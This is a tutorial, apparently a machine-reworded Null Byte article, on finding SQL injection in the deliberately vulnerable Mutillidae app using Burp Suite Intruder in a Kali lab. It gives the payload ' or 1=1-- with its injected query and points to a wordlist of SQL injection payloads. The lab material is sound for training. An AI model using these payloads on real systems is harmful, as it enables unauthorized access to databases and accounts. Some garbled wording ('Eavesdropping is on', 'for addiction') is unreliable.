Web applications are becoming more and more popular and are replacing traditional desktop applications at a faster pace. With all these new apps on the web, various security implications associated with being connected to the internet where anyone can point and stick to them. One of the simplest, yet most common types of security bugs found in modern web apps is SQL injections.
A typical web app does not actually store information in the app itself, but rather communicates with a backend database where data is stored. These queries are handled by SQL queries where the application sends a statement to the database and thus returns the requested information to the application.
What is SQL injection?
SQL injection is a technique used to attack applications that use a database by sending malicious code with intent to access or modify restricted information in the database. There are many reasons why this vulnerability exists, including incorrect input filtering and sanitation.
This type of attack allows you to retrieve sensitive information, modify existing data or even destroy entire databases. The most common attack vector for SQL injection is through input fields ̵1; login forms, search forms, text boxes and file transfer functions are all excellent candidates for exploitation.
In this guide, our goal will be Mutillidae, a deliberately vulnerable web app included in Metasploitable 2, a deliberately vulnerable Linux virtual machine (VM) designed for testing and practice purposes. We will be connected to Metasploitable 2 in an isolated network with Kali as the attacking machine.
Step 1: Install a virtual machine with Metasploitable 2
Burp Suite is a popular tool that can be used to automate testing of web apps for vulnerabilities and is conveniently included in Kali. Before we get to that, we need to set up our target machine.
I will use Metasploitable 2 in this guide, which you can download from Rapid7’s website, but all vulnerable virtual machines work. If you need help installing it, it’s just like installing any other virtual machine on your computer, and Null Byte has some guides that can help you get your virtual lab set up.
One thing to be careful of when using a deliberately vulnerable machine is to expose it to hostile networks. This means that if you are not completely disconnected from the Internet, you should use network address translation (NAT) or host mode only.
When everything is set up, log in to Metasploitable 2 – both username and password must be msfadmin – and find its IP address with ifconfig. What you are looking for in eth0 is the “inet” address, which will be your IP address for testing purposes.
Step 2: Configure mutillidae in your attack browser
After finding the Metasploitable 2s IP address, navigate to it to connect to the web server. I use Firefox in Kali to do this.
Click on “Mutillidae” to open the web app and then navigate to “OWASP Top 10”. Now select “Injection (SQL)” followed by “Extract Data” and then “User Info.” You will be greeted with a login screen.
Step 3: Configure your Burp Suite attack browser
Next, we need to configure the browser to work with Burp Suite as it acts as a proxy to capture and modify requests. I use Firefox here, but most browsers will be similar.
Open your browser’s ‘Settings’, click ‘Advanced’ and then the ‘Network’ tab. Select “Settings” next to it Connection make sure it is set to “Manual Proxy Configuration” and enter 127.0.0.1 as the Http proxy and 8080 as the Port. Then select “Use this proxy server for all protocols”, make sure there is nothing listed below No proxy forand then click “OK.” We are now ready to launch Burp Suite.
Step 4: Listen to the request with Burp Suite
Open the Burp Suite app in Kali, start a new project, then go to the “Proxy” tab and make sure “Eavesdropping is on” is pressed. This allows us to change the request from the web page and insert different values to test for SQL injection. Back on the login page, I have entered an arbitrary username and tried to log in. You can see the raw request as well as parameters, headings and even hex information.
We are mainly interested in the username field because that is what we will change to test for SQL injection errors. Click the “Action” button and then “Send to Intruder.” Alternatively, you can right-click anywhere in the request and do the same.
Step 5: Configure positions and payloads in Burp Suite
Then go to the “Intruder” tab and click on “Positions”. Burp Suite automatically configures the positions where payloads are inserted when a request is sent to the intruder, but since we are only interested in the username field, we can clear all positions by pressing “Clear” on the right. Select the specified value for the username and click the “Add” button. We will use the attack type “Sniper” which goes through a list of values in the payload and tries them one at a time.
Now our position is set and we are ready to configure the payload. SQL queries work by interacting with data in the database using statements. The SELECT statement is used to retrieve data, so a login question would look like:
SELECT username, password FROM users WHERE username="myname" AND password='mypassword';
Let’s look at the classic SQL injection command ‘or 1 = 1–. This is what the SQL statement looks like when entered in the login field:
SELECT username, password FROM users WHERE username="" or 1=1-- AND password='';
The single quote effectively turns the first part into an empty string, and 1 = 1 is always evaluated to true, so the username query will now run as “empty” or “true.” The double dashes comment on the rest of the question so that the password field is ignored. Because “empty” or “true” is always true and the password field is ignored, the database will return account data.
Click on the “Payload” tab and go to “Payload Options” – we can leave all default settings at the moment. Here we can enter our payloads in a simple list by either adding them one by one or loading an existing list. Kali comes with a variety of dictionaries including one specifically for testing SQL injection vulnerabilities. Click “Load” and navigate to /usr/share/wordlists/wfuzz/injection/SQL.txt. Now we are ready to launch our attack.
Step 6: Run an intruder attack in Burp Suite
Click on the “Start attack” button and a new window will appear showing the intruder. Here you can see the progress of the requests plus their payload and status. Be patient as it can take quite a long time to complete depending on the length of the list.
When the intruder is ready, you can view the details of each request by clicking on it.
Step 7: Analyze the results in Burp Suite
What we are looking for here is the answer. Each individual request returned a status code 200-response, but often when a payload succeeds, you see a different code. Usually, another way to determine if a question was successful is whether the length of the answer is noticeably different from the others. I have selected the query that contains the SQL query ‘or 1 = 1 or “=’ because I had previously tested this injection manually, so I knew it would work.
Burp Suite is useful because you can actually render the web page returned in the reply by going to the “Reply” tab and clicking on “Render”. We can see below that our SQL injection was successful and that we now have a username and password. If this was an administrative panel or something like that, we could log in with the administrator information and trigger all sorts of devastation.
SQL Injection in the Wild
Although SQL injection has been known as a serious vulnerability for a long time, it is still one of the most common methods of exploitation today. Part of this is because anyone can put together a semi-functional web app and distribute it on the internet. Even professional software developers often find it difficult to follow secure coding principles, so it’s no surprise when Jimmy on the street makes an insecure application.
To be truly effective with SQL injection, it is probably best to learn SQL yourself. After all, the best way to break something is by knowing how it works and using that knowledge for addiction. Once you perform your tests, once you have found a vulnerability and a payload that works, you can customize SQL to execute your own commands. This is useful for finding out the layout of the table, modifying data and even discovering other tables in the database. There is really no limit to what you can do when you achieve a true grasp of SQL.
Until the day when proper security is the highest priority, there will be SQL injection errors in web applications. This means that there will always be a lot of work for all your white hats, so get out and hack yourself away.
Do you want to start making money as a white hat hacker? Start your career with white-hat hacking with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get more than 60 hours of training from ethical hacking professionals.
Buy now (90% off)>